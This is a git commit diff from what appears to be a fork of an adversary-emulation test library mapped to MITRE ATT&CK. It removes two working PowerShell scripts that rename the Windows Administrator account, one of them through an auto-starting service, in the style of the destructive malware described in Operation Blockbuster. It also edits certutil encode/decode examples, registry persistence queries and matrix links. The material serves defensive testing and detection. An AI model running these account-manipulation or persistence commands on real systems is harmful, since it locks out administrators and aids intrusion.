Merge remote-tracking branch 'redcanaryco/master'
atmathis
commit
be3a018733
|
|
@ -1,62 +0,0 @@
|
|||
# Account Manipulation
|
||||
|
||||
MITRE ATT&CK Technique: [T1098](https://attack.mitre.org/wiki/Technique/T1098)
|
||||
|
||||
Adapted from [Operation Blockbuster](https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf)
|
||||
|
||||
## Example 1
|
||||
|
||||
If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 16 digits.
|
||||
|
||||
$x = Get-Random -Minimum 2 -Maximum 9999
|
||||
$y = Get-Random -Minimum 2 -Maximum 9999
|
||||
$z = Get-Random -Minimum 2 -Maximum 9999
|
||||
$w = Get-Random -Minimum 2 -Maximum 9999
|
||||
Write-Host HaHaHa_$x$y$z$w
|
||||
|
||||
$hostname = (Get-CIMInstance CIM_ComputerSystem).Name
|
||||
|
||||
$fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name
|
||||
|
||||
foreach($member in $fmm) {
|
||||
if($member -like "*Administrator*") {
|
||||
Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w"
|
||||
Write-Host "Successfully Renamed Administrator Account on" $hostname
|
||||
}
|
||||
}
|
||||
|
||||
## Example 2
|
||||
|
||||
If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 8 digits.
|
||||
|
||||
$x = Get-Random -Minimum 2 -Maximum 99
|
||||
$y = Get-Random -Minimum 2 -Maximum 99
|
||||
$z = Get-Random -Minimum 2 -Maximum 99
|
||||
$w = Get-Random -Minimum 2 -Maximum 99
|
||||
$newadmin = "HaHaHa_$x$y$z$w".ToString()
|
||||
|
||||
$serviceName = "Rename Account Service"
|
||||
$serviceDisplayName = "Rename Account Service"
|
||||
$serviceDescription = "Rename Account Service"
|
||||
$serviceExecutable = "wmic useraccount where name='Administrator' rename '$newadmin'"
|
||||
|
||||
if (Get-Service $serviceName -ErrorAction SilentlyContinue)
|
||||
{
|
||||
$serviceToRemove = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'"
|
||||
$serviceToRemove | Stop-Service
|
||||
$serviceToRemove.delete()
|
||||
}
|
||||
else
|
||||
{
|
||||
"service does not exists"
|
||||
}
|
||||
|
||||
Write-Host "Installing service: $serviceName"
|
||||
New-Service -name $serviceName -displayName $serviceDisplayName -binaryPathName $serviceExecutable -startupType Automatic -Description $serviceDescription
|
||||
Write-Host "Installation completed: $serviceName"
|
||||
|
||||
Write-Host "Trying to start new service: $serviceName"
|
||||
|
||||
$serviceToStart = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'"
|
||||
$serviceToStart.startservice()
|
||||
Write-Host "Service started: $serviceName"
|
||||
|
|
@ -3,7 +3,9 @@
|
|||
MITRE ATT&CK Technique: [T1140](https://attack.mitre.org/wiki/Technique/T1140)
|
||||
|
||||
## Example encode executable
|
||||
|
||||
certutil.exe -encode file.exe file.txt
|
||||
|
||||
## Example decode executable
|
||||
|
||||
certutil.exe -decode file.txt file.exe
|
||||
|
|
|
|||
|
|
@ -27,9 +27,11 @@ Use the following command (as Administrator) to view the drivers configured to l
|
|||
|
||||
Reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
|
||||
|
||||
Reference: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
|
||||
References:
|
||||
|
||||
Reference: https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services
|
||||
https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
|
||||
|
||||
https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services
|
||||
|
||||
|
||||
|
||||
|
|
@ -41,6 +43,8 @@ Reference: https://blog.cylance.com/windows-registry-persistence-part-1-introduc
|
|||
reg import [FileName ]
|
||||
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )
|
||||
|
||||
Reference: http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
|
||||
References:
|
||||
|
||||
Reference: https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
|
||||
http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
|
||||
|
||||
https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
|
||||
|
|
|
|||
|
|
@ -4,7 +4,7 @@
|
|||
|-------------------------------------------------------|---------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
|
||||
| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port |
|
||||
| [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media |
|
||||
| [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create%20Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | [Clipboard Data](Collection/Clipboard_Data.md) | Data Encrypted | Connection Proxy |
|
||||
| [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create_Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | [Clipboard Data](Collection/Clipboard_Data.md) | Data Encrypted | Connection Proxy |
|
||||
| Authentication Package | [Application Shimming](Persistence/Application_Shimming.md) | Code Signing | [Credential Dumping](Credential_Access/Credential%20Dumping.md) | Network Service Scanning | Pass the Hash | Execution through Module Load | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
|
||||
| Bootkit | Bypass User Account Control | Component Firmware | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Share Discovery | Pass the Ticket | Graphical User Interface | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
|
||||
| [Change Default File Association](Persistence/Change_Default_File_Association.md) | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | Exploitation of Vulnerability | Peripheral Device Discovery | Remote Desktop Protocol | [InstallUtil](Execution/InstallUtil.md) | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
|
||||
|
|
|
|||
Loading…
Reference in New Issue